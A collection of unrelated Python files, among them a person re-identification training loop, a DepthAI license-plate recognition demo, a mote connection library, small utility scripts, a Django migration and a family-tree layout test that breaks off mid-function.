parser.add_argument('--dataset', type=str, default='market1501',
choices=['market1501', 'cuhk03', 'duke'])
parser.add_argument('--batch_size', default=64, type=int, help='batch_size')
parser.add_argument('--learning_rate', default=0.1, type=float,
help='FC params learning rate')
parser.add_argument('--epochs', default=60, type=int,
help='The number of epochs to train')
parser.add_argument('--share_conv', action='store_true')
parser.add_argument('--stripes', type=int, default=6)
arg = parser.parse_args()
# Fix random seed
torch.manual_seed(1)
torch.cuda.manual_seed_all(1)
# Make saving directory
save_dir_path = os.path.join(arg.save_path, arg.dataset)
os.makedirs(save_dir_path, exist_ok=True)
# ---------------------- Train function ----------------------
def train(model, criterion, optimizer, scheduler, dataloader, num_epochs, device):
start_time = time.time()
# Logger instance
logger = utils.Logger(save_dir_path)
logger.info('-' * 10)
logger.info(vars(arg))
for epoch in range(num_epochs):
logger.info('Epoch {}/{}'.format(epoch + 1, num_epochs))
model.train()
scheduler.step()
# Training
running_loss = 0.0
batch_num = 0
for inputs, labels in dataloader:
batch_num += 1
inputs = inputs.to(device)
labels = labels.to(device)
optimizer.zero_grad()
# with torch.set_grad_enabled(True):
outputs = model(inputs)
# Sum up the stripe softmax loss
loss = 0
for logits in outputs:
stripe_loss = criterion(logits, labels)
loss += stripe_loss
loss.backward()
optimizer.step()
running_loss += loss.item() * inputs.size(0)
epoch_loss = running_loss / len(dataloader.dataset.imgs)
logger.info('Training Loss: {:.4f}'.format(epoch_loss))
# Save result to logger
logger.x_epoch_loss.append(epoch + 1)
logger.y_train_loss.append(epoch_loss)
if (epoch + 1) % 10 == 0 or epoch + 1 == num_epochs:
# Testing / Validating
torch.cuda.empty_cache()
model.set_return_features(True)
CMC, mAP, _ = test(model, arg.dataset, 512)
model.set_return_features(False)
logger.info('Testing: top1:%.2f top5:%.2f top10:%.2f mAP:%.2f' %
(CMC[0], CMC[4], CMC[9], mAP))
logger.x_epoch_test.append(epoch + 1)
logger.y_test['top1'].append(CMC[0])
logger.y_test['mAP'].append(mAP)
if epoch + 1 != num_epochs:
utils.save_network(model, save_dir_path, str(epoch + 1))
logger.info('-' * 10)
# Save the loss curve
logger.save_curve()
time_elapsed = time.time() - start_time
logger.info('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
# Save final model weights
utils.save_network(model, save_dir_path, 'final')
# For debugging
# inputs, classes = next(iter(dataloaders['train']))
# ---------------------- Training settings ----------------------
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train_dataloader = utils.getDataLoader(
arg.dataset, arg.batch_size, 'train', shuffle=True, augment=True)
model = PCBModel(num_classes=len(train_dataloader.dataset.classes),
num_stripes=arg.stripes, share_conv=arg.share_conv, return_features=False)
criterion = nn.CrossEntropyLoss()
# Finetune the net
optimizer = optim.SGD([
{'params': model.backbone.parameters(), 'lr': arg.learning_rate / 10},
{'params': model.local_conv.parameters() if arg.share_conv else model.local_conv_list.parameters(),
'lr': arg.learning_rate},
{'params': model.fc_list.parameters(), 'lr': arg.learning_rate}
], momentum=0.9, weight_decay=5e-4, nesterov=True)
scheduler = lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1)
# Use multiple GPUs
if torch.cuda.device_count() > 1:
model = nn.DataParallel(model)
model = model.to(device)
# ---------------------- Start training ----------------------
train(model, criterion, optimizer, scheduler, train_dataloader,
arg.epochs, device)
torch.cuda.empty_cache()
|
import argparse
import threading
import time
from pathlib import Path
import blobconverter
import cv2
import depthai as dai
import numpy as np
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true",
help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str,
help="Path to video file to be used for inference (conflicts with -cam)")
args = parser.parse_args()
if not args.camera and not args.video:
raise RuntimeError(
"No source selected. Use either \"-cam\" to run on RGB camera as a source or \"-vid <path>\" to run on video"
)
debug = not args.no_debug
openvino_version = "2020.3"
def cos_dist(a, b):
return np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
def to_tensor_result(packet):
return {
tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims)
for tensor in packet.getRaw().tensors
}
def frame_norm(frame, bbox):
return (np.clip(np.array(bbox), 0, 1) * np.array([*frame.shape[:2], *frame.shape[:2]])[::-1]).astype(int)
def to_planar(arr: np.ndarray, shape: tuple) -> list:
return cv2.resize(arr, shape).transpose(2, 0, 1).flatten()
def create_pipeline():
print("Creating pipeline...")
pipeline = dai.Pipeline()
pipeline.setOpenVINOVersion(version=dai.OpenVINO.Version.VERSION_2020_3)
if args.camera:
print("Creating Color Camera...")
cam = pipeline.createColorCamera()
cam.setPreviewSize(672, 384)
cam.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
cam.setInterleaved(False)
cam.setBoardSocket(dai.CameraBoardSocket.RGB)
cam_xout = pipeline.createXLinkOut()
cam_xout.setStreamName("cam_out")
cam.preview.link(cam_xout.input)
# NeuralNetwork
print("Creating License Plates Detection Neural Network...")
det_nn = pipeline.createMobileNetDetectionNetwork()
det_nn.setConfidenceThreshold(0.5)
det_nn.setBlobPath(str(blobconverter.from_zoo(name="vehicle-license-plate-detection-barrier-0106", shaves=4, version=openvino_version)))
det_nn.input.setQueueSize(1)
det_nn.input.setBlocking(False)
det_nn_xout = pipeline.createXLinkOut()
det_nn_xout.setStreamName("det_nn")
det_nn.out.link(det_nn_xout.input)
det_pass = pipeline.createXLinkOut()
det_pass.setStreamName("det_pass")
det_nn.passthrough.link(det_pass.input)
if args.camera:
manip = pipeline.createImageManip()
manip.initialConfig.setResize(300, 300)
manip.initialConfig.setFrameType(dai.RawImgFrame.Type.BGR888p)
cam.preview.link(manip.inputImage)
manip.out.link(det_nn.input)
else:
det_xin = pipeline.createXLinkIn()
det_xin.setStreamName("det_in")
det_xin.out.link(det_nn.input)
# NeuralNetwork
print("Creating Vehicle Detection Neural Network...")
veh_nn = pipeline.createMobileNetDetectionNetwork()
veh_nn.setConfidenceThreshold(0.5)
veh_nn.setBlobPath(str(blobconverter.from_zoo(name="vehicle-detection-adas-0002", shaves=4, version=openvino_version)))
veh_nn.input.setQueueSize(1)
veh_nn.input.setBlocking(False)
veh_nn_xout = pipeline.createXLinkOut()
veh_nn_xout.setStreamName("veh_nn")
veh_nn.out.link(veh_nn_xout.input)
veh_pass = pipeline.createXLinkOut()
veh_pass.setStreamName("veh_pass")
veh_nn.passthrough.link(veh_pass.input)
if args.camera:
cam.preview.link(veh_nn.input)
else:
veh_xin = pipeline.createXLinkIn()
veh_xin.setStreamName("veh_in")
veh_xin.out.link(veh_nn.input)
rec_nn = pipeline.createNeuralNetwork()
rec_nn.setBlobPath(str(blobconverter.from_zoo(name="license-plate-recognition-barrier-0007", shaves=4, version=openvino_version)))
rec_nn.input.setBlocking(False)
rec_nn.input.setQueueSize(1)
rec_xout = pipeline.createXLinkOut()
rec_xout.setStreamName("rec_nn")
rec_nn.out.link(rec_xout.input)
rec_pass = pipeline.createXLinkOut()
rec_pass.setStreamName("rec_pass")
rec_nn.passthrough.link(rec_pass.input)
rec_xin = pipeline.createXLinkIn()
rec_xin.setStreamName("rec_in")
rec_xin.out.link(rec_nn.input)
attr_nn = pipeline.createNeuralNetwork()
attr_nn.setBlobPath(str(blobconverter.from_zoo(name="vehicle-attributes-recognition-barrier-0039", shaves=4, version=openvino_version)))
attr_nn.input.setBlocking(False)
attr_nn.input.setQueueSize(1)
attr_xout = pipeline.createXLinkOut()
attr_xout.setStreamName("attr_nn")
attr_nn.out.link(attr_xout.input)
attr_pass = pipeline.createXLinkOut()
attr_pass.setStreamName("attr_pass")
attr_nn.passthrough.link(attr_pass.input)
attr_xin = pipeline.createXLinkIn()
attr_xin.setStreamName("attr_in")
attr_xin.out.link(attr_nn.input)
print("Pipeline created.")
return pipeline
class FPSHandler:
def __init__(self, cap=None):
self.timestamp = time.time()
self.start = time.time()
self.framerate = cap.get(cv2.CAP_PROP_FPS) if cap is not None else None
self.frame_cnt = 0
self.ticks = {}
self.ticks_cnt = {}
def next_iter(self):
if not args.camera:
frame_delay = 1.0 / self.framerate
delay = (self.timestamp + frame_delay) - time.time()
if delay > 0:
time.sleep(delay)
self.timestamp = time.time()
self.frame_cnt += 1
def tick(self, name):
if name in self.ticks:
self.ticks_cnt[name] += 1
else:
self.ticks[name] = time.time()
self.ticks_cnt[name] = 0
def tick_fps(self, name):
if name in self.ticks:
return self.ticks_cnt[name] / (time.time() - self.ticks[name])
else:
return 0
def fps(self):
return self.frame_cnt / (self.timestamp - self.start)
running = True
license_detections = []
vehicle_detections = []
rec_results = []
attr_results = []
frame_det_seq = 0
frame_seq_map = {}
veh_last_seq = 0
lic_last_seq = 0
if args.camera:
fps = FPSHandler()
else:
cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))
fps = FPSHandler(cap)
def lic_thread(det_queue, det_pass, rec_queue):
global license_detections, lic_last_seq
while running:
try:
in_det = det_queue.get().detections
in_pass = det_pass.get()
orig_frame = frame_seq_map.get(in_pass.getSequenceNum(), None)
if orig_frame is None:
continue
license_detections = [detection for detection in in_det if detection.label == 2]
for detection in license_detections:
bbox = frame_norm(orig_frame, (detection.xmin, detection.ymin, detection.xmax, detection.ymax))
cropped_frame = orig_frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
tstamp = time.monotonic()
img = dai.ImgFrame()
img.setTimestamp(tstamp)
img.setType(dai.RawImgFrame.Type.BGR888p)
img.setData(to_planar(cropped_frame, (94, 24)))
img.setWidth(94)
img.setHeight(24)
rec_queue.send(img)
fps.tick('lic')
except RuntimeError:
continue
def veh_thread(det_queue, det_pass, attr_queue):
global vehicle_detections, veh_last_seq
while running:
try:
vehicle_detections = det_queue.get().detections
in_pass = det_pass.get()
orig_frame = frame_seq_map.get(in_pass.getSequenceNum(), None)
if orig_frame is None:
continue
veh_last_seq = in_pass.getSequenceNum()
for detection in vehicle_detections:
bbox = frame_norm(orig_frame, (detection.xmin, detection.ymin, detection.xmax, detection.ymax))
cropped_frame = orig_frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
tstamp = time.monotonic()
img = dai.ImgFrame()
img.setTimestamp(tstamp)
img.setType(dai.RawImgFrame.Type.BGR888p)
img.setData(to_planar(cropped_frame, (72, 72)))
img.setWidth(72)
img.setHeight(72)
attr_queue.send(img)
fps.tick('veh')
except RuntimeError:
continue
items = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "<Anhui>", "<Beijing>", "<Chongqing>", "<Fujian>", "<Gansu>",
"<Guangdong>", "<Guangxi>", "<Guizhou>", "<Hainan>", "<Hebei>", "<Heilongjiang>", "<Henan>", "<HongKong>",
"<Hubei>", "<Hunan>", "<InnerMongolia>", "<Jiangsu>", "<Jiangxi>", "<Jilin>", "<Liaoning>", "<Macau>",
"<Ningxia>", "<Qinghai>", "<Shaanxi>", "<Shandong>", "<Shanghai>", "<Shanxi>", "<Sichuan>", "<Tianjin>",
"<Tibet>", "<Xinjiang>", "<Yunnan>", "<Zhejiang>", "<police>", "A", "B", "C", "D", "E", "F", "G", "H", "I",
"J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"]
def rec_thread(q_rec, q_pass):
global rec_results
while running:
try:
rec_data = q_rec.get().getFirstLayerFp16()
rec_frame = q_pass.get().getCvFrame()
except RuntimeError:
continue
decoded_text = ""
for idx in rec_data:
if idx == -1:
break
decoded_text += items[int(idx)]
rec_results = [(cv2.resize(rec_frame, (200, 64)), decoded_text)] + rec_results[:9]
fps.tick_fps('rec')
def attr_thread(q_attr, q_pass):
global attr_results
while running:
try:
attr_data = q_attr.get()
attr_frame = q_pass.get().getCvFrame()
except RuntimeError:
continue
colors = ["white", "gray", "yellow", "red", "green", "blue", "black"]
types = ["car", "bus", "truck", "van"]
in_color = np.array(attr_data.getLayerFp16("color"))
in_type = np.array(attr_data.getLayerFp16("type"))
color = colors[in_color.argmax()]
color_prob = float(in_color.max())
type = types[in_type.argmax()]
type_prob = float(in_type.max())
attr_results = [(attr_frame, color, type, color_prob, type_prob)] + attr_results[:9]
fps.tick_fps('attr')
print("Starting pipeline...")
with dai.Device(create_pipeline()) as device:
if args.camera:
cam_out = device.getOutputQueue("cam_out", 1, True)
else:
det_in = device.getInputQueue("det_in")
veh_in = device.getInputQueue("veh_in")
rec_in = device.getInputQueue("rec_in")
attr_in = device.getInputQueue("attr_in")
det_nn = device.getOutputQueue("det_nn", 1, False)
det_pass = device.getOutputQueue("det_pass", 1, False)
veh_nn = device.getOutputQueue("veh_nn", 1, False)
veh_pass = device.getOutputQueue("veh_pass", 1, False)
rec_nn = device.getOutputQueue("rec_nn", 1, False)
rec_pass = device.getOutputQueue("rec_pass", 1, False)
attr_nn = device.getOutputQueue("attr_nn", 1, False)
attr_pass = device.getOutputQueue("attr_pass", 1, False)
det_t = threading.Thread(target=lic_thread, args=(det_nn, det_pass, rec_in))
det_t.start()
veh_t = threading.Thread(target=veh_thread, args=(veh_nn, veh_pass, attr_in))
veh_t.start()
rec_t = threading.Thread(target=rec_thread, args=(rec_nn, rec_pass))
rec_t.start()
attr_t = threading.Thread(target=attr_thread, args=(attr_nn, attr_pass))
attr_t.start()
def should_run():
return cap.isOpened() if args.video else True
def get_frame():
global frame_det_seq
if args.video:
read_correctly, frame = cap.read()
if read_correctly:
frame_seq_map[frame_det_seq] = frame
frame_det_seq += 1
return read_correctly, frame
else:
in_rgb = cam_out.get()
frame = in_rgb.getCvFrame()
frame_seq_map[in_rgb.getSequenceNum()] = frame
return True, frame
try:
while should_run():
read_correctly, frame = get_frame()
if not read_correctly:
break
for map_key in list(filter(lambda item: item <= min(lic_last_seq, veh_last_seq), frame_seq_map.keys())):
del frame_seq_map[map_key]
fps.next_iter()
if not args.camera:
tstamp = time.monotonic()
lic_frame = dai.ImgFrame()
lic_frame.setData(to_planar(frame, (300, 300)))
lic_frame.setTimestamp(tstamp)
lic_frame.setSequenceNum(frame_det_seq)
lic_frame.setType(dai.RawImgFrame.Type.BGR888p)
lic_frame.setWidth(300)
lic_frame.setHeight(300)
det_in.send(lic_frame)
veh_frame = dai.ImgFrame()
veh_frame.setData(to_planar(frame, (300, 300)))
veh_frame.setTimestamp(tstamp)
veh_frame.setSequenceNum(frame_det_seq)
veh_frame.setType(dai.RawImgFrame.Type.BGR888p)
veh_frame.setWidth(300)
veh_frame.setHeight(300)
veh_frame.setData(to_planar(frame, (672, 384)))
veh_frame.setWidth(672)
veh_frame.setHeight(384)
veh_in.send(veh_frame)
if debug:
debug_frame = frame.copy()
for detection in license_detections + vehicle_detections:
bbox = frame_norm(debug_frame, (detection.xmin, detection.ymin, detection.xmax, detection.ymax))
cv2.rectangle(debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 0, 0), 2)
cv2.putText(debug_frame, f"RGB FPS: {round(fps.fps(), 1)}", (5, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(0, 255, 0))
cv2.putText(debug_frame, f"LIC FPS: {round(fps.tick_fps('lic'), 1)}", (5, 30), cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 255, 0))
cv2.putText(debug_frame, f"VEH FPS: {round(fps.tick_fps('veh'), 1)}", (5, 45), cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 255, 0))
cv2.putText(debug_frame, f"REC FPS: {round(fps.tick_fps('rec'), 1)}", (5, 60), cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 255, 0))
cv2.putText(debug_frame, f"ATTR FPS: {round(fps.tick_fps('attr'), 1)}", (5, 75), cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 255, 0))
cv2.imshow("rgb", debug_frame)
rec_stacked = None
for rec_img, rec_text in rec_results:
rec_placeholder_img = np.zeros((64, 200, 3), np.uint8)
cv2.putText(rec_placeholder_img, rec_text, (5, 25), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 255, 0))
rec_combined = np.hstack((rec_img, rec_placeholder_img))
if rec_stacked is None:
rec_stacked = rec_combined
else:
rec_stacked = np.vstack((rec_stacked, rec_combined))
if rec_stacked is not None:
cv2.imshow("Recognized plates", rec_stacked)
attr_stacked = None
for attr_img, attr_color, attr_type, color_prob, type_prob in attr_results:
attr_placeholder_img = np.zeros((72, 200, 3), np.uint8)
cv2.putText(attr_placeholder_img, attr_color, (15, 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 255, 0))
cv2.putText(attr_placeholder_img, attr_type, (15, 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 255, 0))
cv2.putText(attr_placeholder_img, f"{int(color_prob * 100)}%", (150, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
cv2.putText(attr_placeholder_img, f"{int(type_prob * 100)}%", (150, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))
attr_combined = np.hstack((attr_img, attr_placeholder_img))
if attr_stacked is None:
attr_stacked = attr_combined
else:
attr_stacked = np.vstack((attr_stacked, attr_combined))
if attr_stacked is not None:
cv2.imshow("Attributes", attr_stacked)
key = cv2.waitKey(1)
if key == ord('q'):
break
except KeyboardInterrupt:
pass
running = False
det_t.join()
rec_t.join()
attr_t.join()
veh_t.join()
print("FPS: {:.2f}".format(fps.fps()))
if not args.camera:
cap.release()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
osoba = input("Jak się nazywasz? ")
wiek = input("ile masz lat? ")
print("Witaj, ", osoba, "!")
print("Urodziłeś się w: ", 2017 - int(wiek))
rok_pythona = 1991
wiek_pythona = 2017 - rok_pythona
if wiek_pythona > int(wiek):
print ("Python jest starszy")
elif wiek_pythona < int(wiek):
print ("Ty jesteś starszy")
else:
print ("Jesteście w tym samym wieku" )
|
import socket
import config
from settings import ai,ak,sk
from aip import AipSpeech
asp = AipSpeech(ai,ak,sk)
voice_path = './'
# server_IP = '0.0.0.0'
# server_PORT = 15678
message = 'I am Client\n'
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((config.server_IP, config.server_PORT))
client.send(message.encode('utf-8'))
from_server = client.recv(4096)
modified_message = from_server.decode('utf-8')
client.close()
print(from_server)
print(modified_message)
ans = asp.synthesis(modified_message,'zh',1,{'vol':5,'per' : 2, 'pit' : 6,'spd' : 6,'cuid':123})
if not isinstance(ans, dict):
with open(voice_path + 'audio.wav','wb') as f:
f.write(ans)
|
from typing import Union
from .abstract_classes import Field
from .schema import Schema
from .utils import from_iso_date, from_iso_datetime
class String(Field):
def deserialize(self, value: str):
return value
class Date(Field):
def deserialize(self, value: str):
return from_iso_date(value)
class DateTime(Field):
def deserialize(self, value: str):
return from_iso_datetime(value)
class Nested(Field):
related_schema = None
def __init__(self, schema):
assert issubclass(schema, Schema)
self.related_schema = schema
super().__init__()
def deserialize(self, value: Union[dict, list], many: bool = False):
return self.related_schema.load(data=value, many=many)
|
"""
Some audio files in the dataset are too big to be processed in one step,
so they need to be splitted beforehand.
"""
import argparse
# empirically defined 20 MB .mp3 file is big enough to crash feature extractors
import os
from _json import make_encoder
from pathlib import Path
from shutil import copyfile
import sys,inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
import pandas as pd
from config import RAW_DATA_PATH, AVAIL_MEDIA_TYPES, makedirs
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Extract features from a data folder to another')
parser.add_argument('--src_path', help='Source path where audio data files are stored', default=Path('..') / RAW_DATA_PATH)
parser.add_argument('--dest_path', help='Source path where audio data files are stored', default=Path('..') / RAW_DATA_PATH / 'skipped')
parser.add_argument('--label_file', help='file name of label file', default='labels.csv')
parser.add_argument('--ext', help='name of a valid extension to be cleansed', default=None)
args = parser.parse_args()
src_path = Path(args.src_path)
dest_path = Path(args.dest_path)
_ext = args.ext
makedirs(dest_path)
label_filename = args.label_file
df = pd.read_csv(src_path / label_filename)
new_filenames = []
new_labels = []
df_filenames = set(df['filename'])
os_filenames = set(os.listdir(src_path))
# keep the filenames that are in the folder and not in the label file
dif_filenames = os_filenames - df_filenames
for filename in dif_filenames:
ext = filename.split('.')[-1]
if _ext and ext == _ext:
pass
elif ext not in AVAIL_MEDIA_TYPES:
print('info: skipping {}. Extension not recognized.')
continue
os.replace(src_path / filename, dest_path / filename)
print('info: moving {} from {} to {}.'.format(filename, src_path, dest_path))
|
"""connection.py: Connection for connecting to serial or sf ports."""
import logging
import threading
import time
from codecs import encode
from six.moves import queue
from moteconnection.connection_events import ConnectionEvents
from moteconnection.connection_forwarder import SfConnection
from moteconnection.connection_serial import SerialConnection
from moteconnection.utils import split_in_two
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
__author__ = "Raido Pahtma"
__license__ = "MIT"
class DispatcherError(Exception):
pass
class ConnectionBusyException(Exception):
pass
class ConnectionException(Exception):
pass
class Connection(threading.Thread):
def __init__(self, autostart=True):
super(Connection, self).__init__()
self._dispatchers = {}
self._real_connection = None
self._last_connect = 0
self._connection_type = None
self._connection_info = None
self._reconnect_period = None
self._event_connected = None
self._event_disconnected = None
# New connection types can be added here
self.connection_types = {"loopback": LoopbackConnection, "sf": SfConnection, "serial": SerialConnection}
self._queue = queue.Queue()
# Can be connected, disconnected or somewhere in between
self._connected = threading.Event()
self._connected.clear()
self._disconnected = threading.Event()
self._disconnected.set()
self._alive = threading.Event()
self._alive.set()
if autostart:
self.start()
def join(self, timeout=None):
self._alive.clear()
if self._real_connection is not None:
self._real_connection.join(timeout)
threading.Thread.join(self, timeout)
def send(self, packet):
if packet.dispatch in self._dispatchers:
self._dispatchers[packet.dispatch].send(packet)
else:
raise DispatcherError("No dispatcher for sending {:02X}".format(packet.dispatch))
def register_dispatcher(self, dispatcher):
self.remove_dispatcher(dispatcher.dispatch)
self._dispatchers[dispatcher.dispatch] = dispatcher
dispatcher.attach(self._subsend)
def remove_dispatcher(self, dispatch):
if dispatch in self._dispatchers:
self._dispatchers[dispatch].detach()
del self._dispatchers[dispatch]
def retrieve_dispatcher(self, dispatch):
if dispatch in self._dispatchers:
return self._dispatchers[dispatch]
return None
def connected(self):
return self._connected.isSet() and not self._disconnected.isSet()
def connect(self, connection_string, reconnect=None, connected=None, disconnected=None):
"""
:param connection_string:
:param reconnect: Optional reconnect period. Connection is attempted once if not set.
:param connected: Optional callback for receiving connection establishment notifications.
:param disconnected: Optional callback for receiving disconnection notifications.
:return:
"""
if self._connected.isSet() is False and self._disconnected.isSet():
log.debug("connect")
conntype, conninfo = split_in_two(connection_string, "@")
if conntype in self.connection_types:
self._connection_type = conntype
self._connection_info = conninfo
self._reconnect_period = reconnect
self._event_connected = connected
self._event_disconnected = disconnected
self._disconnected.clear()
self._queue.put((ConnectionEvents.EVENT_START_CONNECT, None))
else:
raise ConnectionException("Specified connection type {:s} not supported".format(conntype))
else:
raise ConnectionBusyException("Busy")
def disconnect(self):
self._reconnect_period = None
log.debug("disconnect")
while not self._connected.is_set() and not self._disconnected.is_set(): # Connecting
log.debug("waiting")
self._connected.wait(0.1)
if self._real_connection is not None:
self._real_connection.join()
self._disconnected.wait()
def _subsend(self, packet):
if self._real_connection is not None:
self._queue.put((ConnectionEvents.MESSAGE_OUTGOING, packet))
else:
if packet.callback is not None:
packet.callback(packet, False)
def _receive(self, data):
if len(data) > 0:
dispatch = ord(data[0:1])
if dispatch in self._dispatchers:
self._dispatchers[dispatch].receive(data)
else:
log.debug("No dispatcher for receiving %02X", dispatch)
else:
log.debug("Received 0 bytes of data ...")
def run(self):
while self._alive.isSet():
try:
item_type, item = self._queue.get(True, 1.0)
if item_type == ConnectionEvents.MESSAGE_INCOMING:
log.debug("incoming %s", encode(item, "hex"))
self._receive(item)
elif item_type == ConnectionEvents.MESSAGE_OUTGOING:
log.debug("outgoing %s", item)
self._real_connection.send(item)
elif item_type == ConnectionEvents.EVENT_CONNECTED:
log.info("connected")
self._connected.set()
self._disconnected.clear()
if callable(self._event_connected):
self._event_connected()
elif item_type == ConnectionEvents.EVENT_DISCONNECTED:
log.info("disconnected")
self._connected.clear()
self._disconnected.set()
if callable(self._event_disconnected):
self._event_disconnected()
elif item_type == ConnectionEvents.EVENT_START_CONNECT:
self._connect()
else:
raise Exception("item_type is unknown!")
except queue.Empty:
if self._disconnected.isSet():
if self._reconnect_period is not None and self._reconnect_period >= 0:
if time.time() > self._last_connect + self._reconnect_period:
self._queue.put((ConnectionEvents.EVENT_START_CONNECT, None))
continue
def _connect(self):
self._last_connect = time.time()
self._real_connection = self.connection_types[self._connection_type](self._queue, self._connection_info)
class Dispatcher(object):
def __init__(self, dispatch):
self._dispatch = dispatch
self._sender = None
@property
def dispatch(self):
return self._dispatch
@staticmethod
def _deliver(receiver, message):
if isinstance(receiver, queue.Queue):
receiver.put(message)
else:
receiver(message)
def attach(self, sender):
self._sender = sender
def detach(self):
self._sender = None
def send(self, packet):
raise NotImplementedError
def receive(self, data):
raise NotImplementedError
class LoopbackConnection(threading.Thread):
def __init__(self, event_queue, info):
super(LoopbackConnection, self).__init__()
self._queue = event_queue
self._info = info
self.start()
def join(self, timeout=None):
self._queue.put((ConnectionEvents.EVENT_DISCONNECTED, None))
threading.Thread.join(self, timeout)
def send(self, data):
self._queue.put((ConnectionEvents.MESSAGE_INCOMING, data))
def run(self):
self._queue.put((ConnectionEvents.EVENT_CONNECTED, None))
|
import os
def name_ext(path):
p, e = os.path.splitext(path)
if p.endswith('.tar'):
return p[:-4], '.tar' + e
return p, e
def name(path):
return name_ext(path)[0]
def ext(path):
return name_ext(path)[1]
## The search parameter is for Egg files, since they have a different structure
def zip_files(zf, search='egg-info'):
names = [n for n in zf.namelist() if search in n]
fobj_list = [zf.read(n) for n in names]
return list(zip(fobj_list, map(os.path.basename, names)))
def tar_files(tf):
names = [n for n in tf.getnames() if 'egg-info' in n and not n.endswith('egg-info')]
fobj_list = [tf.extractfile(n).read() for n in names]
return list(zip(fobj_list, map(os.path.basename, names))) |
from GetPot import GetPot
import numpy as np
import sys
import time
def g(xa=0.75,loc=2.0,D=0.5,S=1.0):
#S = 1.0 #source strength
#D = 0.5 #diffusion coefficient
#loc = 2.0 #depth in cm
cof = S/xa
#print '...in source.py...'
#print 'D,xa:',D,xa
L = np.sqrt(D/xa)
flux = cof*(1.0-np.exp(-loc/L))
return flux
if __name__=='__main__':
cl = GetPot(sys.argv)
if cl.search('-i'):
inpFileName = ''
inpFileName = cl.next(inpFileName)
input_file=GetPot(Filename=inpFileName)
else: raise IOError('Requires an input file using -i.')
xa = input_file('Problem/xa' ,1.0)
D = input_file('Problem/D' ,1.0)
loc= input_file('Problem/loc',1.0)
S = input_file('Problem/S' ,1.0)
outFileName = input_file('Output/file','test.out')
print 'outFileName:',outFileName
result = g(xa,D,loc,S)
writeFile = file(outFileName,'w')
writeFile.writelines('res,'+str(result)+'\n')
writeFile.close()
|
# Generated by Django 2.0.7 on 2018-09-16 20:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ficha', '0004_auto_20180915_1036'),
]
operations = [
migrations.AddField(
model_name='ficha',
name='ajustado',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='ficha',
name='ideal',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='ficha',
name='predito',
field=models.DecimalField(blank=True, decimal_places=2, max_digits=5, null=True),
),
]
|
"""
Unittest for familytree.layout.butterfly module.
"""
from familytree.person import Person
from familytree.table import Table
from familytree.layout.butterfly import ButterflyLayout
def _get_box(elements, person):
filtered = [e for e in elements
if getattr(e, 'person', None) == person]
assert len(filtered) == 1
return filtered[0]
class TestButterflyLayout:
def test_butterfly(self):
table = Table([
Person(1, "father1", "M", spouse_id=2),
Person(2, "mother1", "F", spouse_id=1),
Person(3, "brother1", "M", father_id=1, mother_id=2, birth_order=1),
Person(4, "brother2", "M", father_id=1, mother_id=2, birth_order=3),
Person(5, "husband", "M", spouse_id=6, father_id=1, mother_id=2, birth_order=2),
Person(6, "wife", "F", spouse_id=5, father_id=7, mother_id=8, birth_order=1),
Person(7, "father2", "M", spouse_id=8),
Person(8, "mother2", "F", spouse_id=7),
Person(9, "sister1", "F", father_id=7, mother_id=8, birth_order=2)
])
layout_func = ButterflyLayout()
elements = layout_func(table, table.get(5))
assert len(elements) == 9 + 3 + 5
box_p1 = _get_box(elements, table.get(1))
box_p2 = _get_box(elements, table.get(2))
box_p3 = _get_box(elements, table.get(3))
box_p4 = _get_box(elements, table.get(4))
box_p5 = _get_box(elements, table.get(5))
box_p6 = _get_box(elements, table.get(6))
box_p7 = _get_box(elements, table.get(7))
box_p8 = _get_box(elements, table.get(8))
box_p9 = _get_box(elements, table.get(9))
assert box_p1.xmin < box_p2.xmin < box_p7.xmin < box_p8.xmin
assert box_p1.ymin == box_p2.ymin == box_p7.ymin == box_p8.ymin
assert box_p3.xmin < box_p4.xmin < box_p5.xmin < box_p6.xmin < box_p9.xmin
assert box_p3.ymin == box_p4.ymin == box_p5.ymin == box_p6.ymin == box_p9.ymin
def test_single_no_parent_info(self):
table = Table([
Person(1, "target"),
Person(2, "other"),
Person(3, "other"),
])
layout_func = ButterflyLayout()
elements = layout_func(table, table.get(1))
assert len(elements) == 1
def test_single_with_parents(self):
table = Table([
Person(1, "father", "M", spouse_id=2),
Person(2, "mother", "F", spouse_id=1),
Person(3, "target", "M", father_id=1, mother_id=2, birth_order=1),
Person(4, "brother", "M", father_id=1, mother_id=2, birth_order=2),
])
layout_func = ButterflyLayout()
elements = layout_func(table, table.get(3))
